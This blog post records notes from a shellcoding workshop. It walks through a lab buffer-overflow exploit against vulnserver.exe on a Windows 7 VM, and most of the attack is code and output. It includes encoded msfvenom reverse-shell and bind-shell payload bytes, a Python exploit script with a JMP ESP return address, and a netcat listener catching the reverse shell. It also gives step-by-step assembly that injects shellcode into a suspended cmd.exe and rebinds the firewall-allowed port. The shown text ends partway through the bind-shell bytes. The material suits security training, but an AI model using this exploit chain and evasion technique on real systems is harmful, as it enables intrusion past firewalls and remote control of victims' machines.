Advanced Shellcoding Workshop
Today I attended an advanced shellcoding workshop organized by Div0 and taught by Arnold Anthony. Previously I had attended the basics of buffer overflow and custom shellcoding workshop taught by him but I had lost the notes, so this time I'm going to post my notes here so I won't lose them again.
A few minutes after the workshop started, the courier came knocking on my door and delivered the @WakeTheCrew espresso coffee concentrate (highly recommended!) that I had ordered 2 days ago. After enjoying a cup of cold brew coffee, I was ready to start hacking!
Arnold starts by explaining the goal of this workshop. Sometimes during reconnaissance, we might know the server is running a vulnerable process but is protected by firewall and thus, we cannot get a reverse/bind shell. In this workshop, he explained how to create a shellcode that rebinds the socket to the same port that's allowed by the firewall, so we can connect to it.
In this workshop, we're using Win7 VM which had ASLR disabled on purpose. In real world, generally we will need to bypass ASLR, however this will be out of the scope of this workshop.
Here's the IP addresses of the VMs I'm using.
- Win7: 172.16.202.133
- Kali Linux: 172.16.202.130
Why and when does a rebind socket needed?
First, let's review a situation when a rebind shell is not needed.
In our PoC (proof of concept), a vulnerable server
vulnserver.exe
was started in the Win7 VM.
I started by port scanning the Win7 machine using
nmap
in Kali:
nmap -sS 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 10:17 +08
Nmap scan report for 172.16.202.133
Host is up (0.00056s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
9999/tcp open abyss <------ vulnserver.exe
10243/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
MAC Address: 00:0C:29:73:49:4C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
I can see there are a lot of services running, one of them is port 9999 served by our
vulnserver
.
Here I created a Windows reverse shell payload using
msfvenom
which generates a shellcode for Python script. A vulnerable process receiving this payload will connect to my Kali machine over port 4444.
msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp lhost=172.16.202.130 lport=4444 -e x86/shikata_ga_nai -b "\x00" -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf = b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"
I pasted the generated payload in my Python script
exp.py
, where
0x625011af
is the “JMP ESP” address. Arnold said he won't explain how we get to this address since that's covered in the previous Buffer Overflow workshop.
# !/usr/bin/python
import socket
import sys
buf = b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" +"\x90"*10+ buf + "C"*(3000-len(buf)-4-2003-10) # 625011af
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('172.16.202.133',9999))
s.send(('TRUN /.:/'+shellcode))
print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode)))
s.close()
except:
print("Error connecting to server")
sys.exit()
So I started a
netcat
listener in a new console tab in Kali:
nc -lvp 4444
Then I ran the exploit script:
python exp.py
When I checked
netcat
I can see a Windows command prompt was displayed.
This means the Python script successfully connected to my Win7 machine over port 9999, then the shellcode creates a reverse shell using a random local port, which calls back to my
netcat
listener on my Kali machine over port 4444:
C:\Users\test\Desktop>netstat -ano | findstr 4444
netstat -ano | findstr 4444
TCP 172.16.202.133:49175 172.16.202.130:4444 ESTABLISHED 2212
Imagine if there is a firewall that blocks connection to custom ports like 4444. In this case, there is no way we can get the reverse shell to work.
To simulate this scenario, I disabled all inbound rules in "Windows Firewall" which allowed external connections to connect to this machine. Then I created a new rule which only allow inbound connections to port 9999.
- Inbound Rules > Select all > Disable rule
- Action > New Rule > Port > Specify TCP port 9999 > Allow the conection > Next > Give a name > Finish
Next, I configured the firewall to block all outbound connections from this Win7 VM:
- Right click on "Windows Firewall with Advanced Security" > Properties > Domain Profile/Private Profile/Public Profile > Outbound connections > Block > OK
Now when I do a port scan, I can confirm the only exposed port in Win7 is port 9999. In real world, if we see only one or two ports exposed, this means there's probably a firewall involved.
nmap 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 11:03 +08
Nmap scan report for 172.16.202.133
Host is up (0.00038s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
9999/tcp open abyss
MAC Address: 00:0C:29:73:49:4C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
If I re-run
netcat
and the Python script again, this time we will not get a shell. Even though the script was able to connect to port 9999 and exploited the server, the firewall blocked outbound connection to my Kali machine.
So the goal of this workshop is to figure out how we can get a shell even in this situation.
How does a Rebind Socket work
Overview:
- Create a suspended
cmd.exe
process via shellcode. - In
cmd.exe
process, allocate a memory space. - Write a shellcode inside this allocated memory.
- Using primary thread in
cmd.exe
process, get the EIP register value. - Change EIP register value into the allocated memory address.
- Now that EIP is pointed to the memory, resume the thread to execute the bind shell.
- Terminate the
vulnserver.exe
In the rest of the post, I will explain steps by steps how to do this.
Step 1 - Create a process
Open
vulnserver.exe
in Immunity Debugger.
Click play button to run the application.
In the bottom input field, type
bp 0x625011af
to create a breakpoint at the memory address defined in the Python script.
Click "b" button in Immunity Debugger to check the breakpoint is put in place, click "c" to come back to the main window.
Then I removed the previous shellcode in the Python script and run the script.
I can see in that execution stopped at the breakpoint (
JMP ESP
).
Then I step over the code using F8, or by clicking the down arrow icon (third button after Play button).
Here is where I will create a new process using Windows API CreateProcessA
.
According to MSDN, these are the arguments needed to construct CreateProcessA:
BOOL CreateProcessA(
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);
Out of all these arguments, I will leave most of them null. There are only 4 arguments that are important.
lpCommandLine
: specify a string value of the command we want to run here, in this case it will be "cmd".
dwCreationFlags
: specify a flag that creates a suspended process with no window shown.
lpStartupInfo
: points to a structure containing 18 arguments for the window, which should be all null because we want the process hidden at all times.
lpProcessInformation
: points to the most important structure that will be used to get the handle of the process. In the structure,
hProcess
and
hThread
will be the handle that we want to control, depending on if we want to get hold of the process or thread.
Now, I will start creating the argument.
Use any "ASCII to Hex" online tool to convert "cmd" string to hex:
63 6d 64
The string has to be terminated by adding 0x00 (null byte) at the end.
63 6d 64 00
When putting the values in the stack, it has to be in reverse order:
00 64 6d 63
However zeroes is considered bad character in a shellcode, so we have to make sure this doesn't show up.
In Immunity Debugger, press spacebar at
NOP
, or double click it.
There are many options to avoid bad character in the shellcode. One method we can use is to add a value that does not end in 00, then add or subtract from it.
In this example I'm using a general purpose register EDX.
MOV EDX,10747d73
Then we will subtract 10101010 from EDX:
SUB EDX,10101010
The value stored in EDX register will end up with
0x00646d63
(the equivalent hex value of "cmd" in ASCII). Push it to the stack:
PUSH EDX
If I step over I can see the address of the stack frame which stores the "cmd" string in the bottom right pane of Immunity Debugger.
Next I will get the value of the address from the stack and put into another general purpose register such as EBX. This will be used later as the value for
lpCommandLine
.
MOV EBX,ESP
I can create values for the other arguments on the fly, but let's focus on
lpStartupInfo
structure next.
Since these are all null, I'll use XOR to create a zero value and save it in a general purpose register such as ECX:
XOR ECX,ECX
The value shown on the left side ("33 C9") is the shellcode payload for this null value.
I will push this 17 times for all the
lpStartupInfo
arguments.
PUSH ECX
Next I will save the address in the stack frame that points to this
lpStartupInfo
structure into another register, such as ESI.
MOV ESI,ESP
The value stored in ESI is a memory address that points to
lpStartupInfo
, for example this would be something like
0x0194F998
.
lpProcessInformation
is another structure needed in
CreateProcessA
. Though we can use any memory address we want to populate this information into, I'll give it 4 bytes offset from
0x0194F998
, which is
0x0194F99C
.
I'll assign this memory address value to EDI:
MOV EDI,ESI
ADD EDI,4
So far:
ESI contains the memory address of
lpStartupInfo
EDI contains the memory address of
lpProcessInformation
Push both to the stack:
PUSH EDI
PUSH ESI
Next argument in
CreateProcessA
structure will be 2 nulls:
BOOL CreateProcessA(
LPCSTR lpApplicationName, # null
LPSTR lpCommandLine, # string "cmd" that's stored in EBX
LPSECURITY_ATTRIBUTES lpProcessAttributes, # null
LPSECURITY_ATTRIBUTES lpThreadAttributes, # null
BOOL bInheritHandles, # null
DWORD dwCreationFlags, # string "0800004" that's stored in ECX
LPVOID lpEnvironment, # null
LPCSTR lpCurrentDirectory, # null
LPSTARTUPINFOA lpStartupInfo, # memory address stored in ESI
LPPROCESS_INFORMATION lpProcessInformation # memory address stored in EDI
);
So we push ECX which contains zero value two times:
PUSH ECX
PUSH ECX
Then for
dwCreationFlags
we need to create a value
0x0800004
.
Why this value, you ask? Refer to the Process Creation Flags section in MSDN. This is the sum of two values that I want the process to be created with:
- 0x0000004: suspended process
- 0x0800000: no window
0x0800004
contains bad character because it ends in null byte (zero value).
ECX register already contains zero, so I will reuse it for this operation.
Here I added a value that does not contain bad character, then substract accordingly to get the value that we want:
MOV ECX,9010105
SUB ECX,1010101
PUSH ECX
Finally I push 3 nulls for the next 3 arguments.
XOR ECX,ECX
PUSH ECX
PUSH ECX
PUSH ECX
Then push the last 2 values to complete the structure.
PUSH EBX
PUSH ECX
MSDN describes that the API
CreateProcessA
is implemented in kernel32.dll. I can get the specific address of the API using tools like Arwin.
C:\Users\test\Desktop>arwin kernel32.dll CreateProcessA
arwin - win32 address resolution program - by steve hanna - v.01
CreateProcessA is located at 0x77de2082 in kernel32.dll
Now we know that the memory address where this
CreateProcessA
API lives is
0x77DE2082
, I can call this memory address directly to populate the structure in the stack.
CALL 77DE2082
Or call it like this. Note that the API name is case sensitive:
CALL kernel32.CreateProcessA
But I prefer to store the memory address of the API in a register before calling it:
MOV EBX,kernel32.CreateProcessA
CALL EBX
The
LastErr ERROR_SUCCESS
means that the API result was successful.
But how do I check that the process was created successfully because we configured the process to remain stealth without opening any window?
I used Process Hacker
to see that a new process
cmd.exe
was created under
vulnserver.exe
. Right clicking the cmd.exe process, I can see there is an option called "Resume". This implies that the process was created in "Suspended" mode, just like what we intended.
Step 2 - Allocate memory space to the process
The stack now will represent the structure of the process information:
typedef struct _PROCESS_INFORMATION {
HANDLE hProcess; # 70
HANDLE hThread;
DWORD dwProcessId;
DWORD dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;
In the stack, we can see that the memory address
0x0174F99C
contains value
00000070
that gets populated by the process - this is value of
hProcess
, in other words, the process handle or remote control of the
cmd.exe
process.
The next step is to create memory allocation for the process using VirtualAllocEx
API.
This is the structure of the API arguments:
LPVOID VirtualAllocEx(
HANDLE hProcess, # 70
LPVOID lpAddress, # null
SIZE_T dwSize, # 01F4
DWORD flAllocationType, # 3000
DWORD flProtect # 40
);
Here's how I get the values for them:
- dwsize: around 500 bytes of memory is needed, so converting the decimal value 500 to hex this value will be 0x01F4.
flAllocationType: 0x3000. This is the sum of the following:
- MEM_COMMIT: 0x00001000
- MEM_RESERVE: 0x00002000
flProtect: we want the memory to be executable, readable, and writable.
- PAGEEXECUTEREADWRITE: 0x40
I pop the stack twice to get to the
hProcess
value
0x70
and loads it into ESI.
POP ESI
POP ESI
Next pop the top value of the stack into EDI.
POP EDI
Now I will start to construct the arguments for
VirtualAllocEx
. The first argument value is 0x40 which is fine to push as is:
PUSH 40
Next value is 0x3000 but this can't be pushed directly because contains null byte. So I'll do it like this:
XOR ECX,ECX
MOV CH,30
The third argument is
dwSize
which is 0x01F4 (500 bytes):
MOV CH,1
MOV CL,0F4
PUSH ECX
Next argument is null:
XOR ECX,ECX
PUSH ECX
Last argument
hProcess
is already stored in ESI register so I'll push it into the stack:
PUSH ESI
Finally I will call the API:
MOV EBX,kernel32.VirtualAllocEx
CALL EBX
This will return the result which is the address of the allocated memory in the EAX register.
How do we know that memory was allocated to the process?
I can attach the process to a debugger, in this case I'm using Windbg:
- File > Attach to Process > select cmd.exe
To attach to the correct process, I'll make sure there are no other
cmd.exe
window open, however the process ID can be easily distinguished in Process Hacker.
Windbg Memory window will show the allocated memory address which is 160000. This shows that the memory is successfully allocated to the process.
I'll save the start of memory address somewhere, like in the EBP register.
MOV EBP,EAX
Step 3 - Move the bind shellcode into allocated memory.
The final payload will be a bind shellcode but I'll pop calculator as a PoC for now.
Let's generate the shellcode using
msfvenom
and add it to the Python script:
msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] =
"\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab";
I'll add some NOPs (no operation) to partition the rebind shellcode payload from the generated shellcode (our PoC that pops calc) to avoid risking them overwriting each other.
calc_shell=("\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10 + payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + calc_shell
To write this shellcode into the allocated memory, WriteProcessMemory
API will be used here.
BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer, # the address we want to start copying from stack. Choose from NOP area.
SIZE_T nSize, # 500 bytes (0x01F4)
SIZE_T *lpNumberOfBytesWritten # null
);
WriteProcessMemory
accepts 5 arguments:
Last argument is null.
nSize: how many bytes of memory we're going to write (500 bytes).
lpBuffer: from where we're going to start writing from.
lpBaseAddress: the start of memory address allocated by the
VirtualAllocEx
hProcess: the process handle
For the last argument, give it a null value:
XOR EBX,EBX
PUSH EBX
Second argument
nSize
is 500 (0x01F4)
MOV BH,1
MOV BL,0F4
PUSH EBX
Third argument is the
lpBuffer
.
Since we're trying to copy the data from the stack that contains our PoC shellcode into the memory address, select a few buffer in between to be safe. Ideally this should be up a few bytes, within the NOP sledges area.
How to measure the distance?
The generated
msfvenom
payload starts with "DA D7". Check where this resides in the stack, for example the value
BAD7DA90
is stored at the address
017BFC30
. Double click that address, scroll up to see how far it is from the stack. The top of the stack, where the ESP register points to, is memory address
017BF99C
and contains the value
01F4
. The debugger shows that the distance (offset) between this selected address and the top of stack is 274.
MOV EBX,ESP
ADD BX,274
Push all the remaining arguments to the stack:
PUSH EBX
PUSH EBP
PUSH ESI
Call
WriteProcessMemory
API:
MOV EBX,kernel32.WriteProcessMemory
CALL EBX
To confirm this operation is successful, in Windbg, clear the
160000
in Memory window and retype it to refresh the data. The memory should no longer contain zero data.
Step 4 - Get the EIP register value in the primary thread
Type tilda character ~ at the bottom of the Windbg Command window. This will return the threads, whereby 0 is the primary thread.
The GetThreadContext
API will be used here:
BOOL GetThreadContext(
HANDLE hThread,
LPCONTEXT lpContext
);
lpContext
points to the context structure which is very big and needs to be far away from the stack.
Within the context structure,
ContextFlags
value should be
0x10001
which is the sum of:
- 0x10000: indicates a 32-bit architecture (CONTEXT_i386)
- 0x00001: get the value of EIP register
We'll choose an offset of
0x150
for example, so that when it populates the data, the data will not overwrite existing stuff in the stack.
MOV EBX, ESP
SUB BX,150
Create value
0x010001
in ECX:
XOR ECX,ECX
MOV CX,0FFFF
INC ECX <--- 0FFFF + 1 = 10000
INC ECX <--- 10000 + 1 = 10001
Move the value of ECX (0x10001) to the memory address location pointed by the address of EBX.
MOV DWORD PTR DS:[EBX],ECX
Push EBX. This will be the first argument
lpContext
:
PUSH EBX
Push the next argument
hThread
:
PUSH EDI
Call the API:
MOV EBX,kernel32.GetThreadContext
CALL EBX
Step 5 - Change EIP register value into the allocated memory address.
Now that EIP register value was retrieved via
GetThreadContext
,
SetThreadContext
can be used to set the value of EIP:
BOOL SetThreadContext(
HANDLE hThread,
const CONTEXT *lpContext
);
In the debugger, double click the address of the stack, scroll up to the address where the thread starts, here's showing an offset value of 98.
MOV ECX,ESP
SUB CL,98
Point to EBP which contains the start of allocated memory address (160000):
MOV DWORD PTR DS:[ECX],EBP
Have to recreate the context structure because it was overwritten by the previous operation.
MOV EBX,ESP
SUB BX,150
Push the two arguments for
SetThreadContext
and call the API:
PUSH EBX
PUSH EDI
MOV EBX,kernel32.SetThreadContext
CALL EBX
In Windbg Command window, type the following command. "e" is to execute commands and "r" is to view registers, in the primary thread 0.
~0 e r
Check the value of EIP register to confirm if it was successfully overwritten to
16000
Step 6 - Resume the thread to execute the bind shell.
ResumeThread
API only accepts one argument which is the thread handle:
DWORD ResumeThread(
HANDLE hThread
);
Push this to the stack and call the API:
PUSH EDI
MOV EBX,kernel32.ResumeThread
CALL EBX
In Windbg Command window, type "G" to start the debugger, which will run the instruction at the memory address pointed by the EIP register. This will execute the PoC shellcode and a calculator window should pop up at this point.
Step 7 - Terminate the
vulnserver.exe
If I call the ExitProcess
API here, it will exit the
vulnserver
process and make the port 9999 available again.
Before that, it's recommended to call the Sleep
API to make our
cmd.exe
process sleep for 5 seconds so that the
vulnserver
process have enough time to exit and release the port 9999:
void Sleep(
DWORD dwMilliseconds
);
Scroll down the stack, find somewhere in the NOP sledge which is closer to the bind shellcode to place the instructions which calls the Sleep API:
XOR ECX,ECX
MOV CL,88
MOV CH,13 # hex value 0x1388 (5000 in decimal)
PUSH ECX
MOV EBX,kernel32.Sleep
CALL EBX
Remember to put some padding between Sleep and Bind Shell:
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10+ payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + sleep + "\x90"*10 + calc_shell
Time to call the
ExitProcess
API:
void ExitProcess(
UINT uExitCode
);
Give the ExitCode zero value:
XOR ECX,ECX
PUSH ECX
MOV EBX,kernel32.ExitProcess
CALL EBX
Run the exploit and check if it's popping calculater after sleeping for 5 seconds.
If everything's good, we can replace the payload so that instead of popping calc, creates a bind shell that accepts connection to port 9999 that has been released by the
vulnserver
process.
Generate a shellcode for the bind shell and assign the payload to a variable in the script.
msfvenom -a x86 -platform Windows -p windows/shell_bind_tcp LPORT=9999 -e x86/shikata_ga_nai -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] =
"\xbb\x80\x9d\xd1\x48\xdb\xd4\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x53\x31\x5a\x12\x83\xea\xfc\x03\xda\x93\x33\xbd\x26\x43\x31"
"\x3e\xd6\x94\x56\xb6\x33\xa5\x56\xac\x30\x96\x66\xa6\x14\x1b"
"\x0c\xea\x8c\xa8\x60\x23\xa3\x19\xce\x15\x8a\x9a\x63\x65\x8d"
"\x18\x7e\xba\x6d\x20\xb1\xcf\x6c\x65\xac\x22\x3c\x3e\xba\x91"
"\xd0\x4b\xf6\x29\x5b\x07\x16\x2a\xb8\xd0\x19\x1b\x6f\x6a\x40"
"\xbb\x8e\xbf\xf8\xf2\x88\xdc\xc5\x4d\x23\x16\xb1\x4f\xe5\x66"
"\x3a\xe3\xc8\x46\xc9\xfd\x0d\x60\x32\x88\x67\x92\xcf\x8b\xbc"
"\xe8\x0b\x19\x26\x4a\xdf\xb9\x82\x6a\x0c\x5f\x41\x60\xf9\x2b"
"\x0d\x65\xfc\xf8\x26\x91\x75\xff\xe8\x13\xcd\x24\x2c\x7f\x95"
"\x45\x75\x25\x78\x79\x65\x86\x25\xdf\xee\x2b\x31\x52\xad\x23"
"\xf6\x5f\x4d\xb4\x90\xe8\x3e\x86\x3f\x43\xa8\xaa\xc8\x4d\x2f"
"\xcc\xe2\x2a\xbf\x33\x0d\x4b\x96\xf7\x59\x1b\x80\xde\xe1\xf0"
"\x50\xde\x37\x6c\x58\x79\xe8\x93\xa5\x39\x58\x14\x05\xd2\xb2"
"\x9b\x7a\xc2\xbc\x71\x13\x6b\x41\x7a\x3c\x63\xcc\x9c\x28\x6b"
"\x98\x37\xc4\x49\xff\x8f\x73\xb1\xd5\xa7\x13\xfa\x3f\x7f\x1c"
"\xfb\x15\xd7\x8a\x70\x7a\xe3\xab\x86\x57\x43\xbc\x11\x2d\x02"
"\x8f\x80\x32\x0f\x67\x20\xa0\xd4\x77\x2f\xd9\x42\x20\x78\x2f"
"\x9b\xa4\x94\x16\x35\xda\x64\xce\x7e\x5e\xb3\x33\x80\x5f\x36"
"\x0f\xa6\x4f\x8e\x90\xe2\x3b\x5e\xc7\xbc\x95\x18\xb1\x0e\x4f"
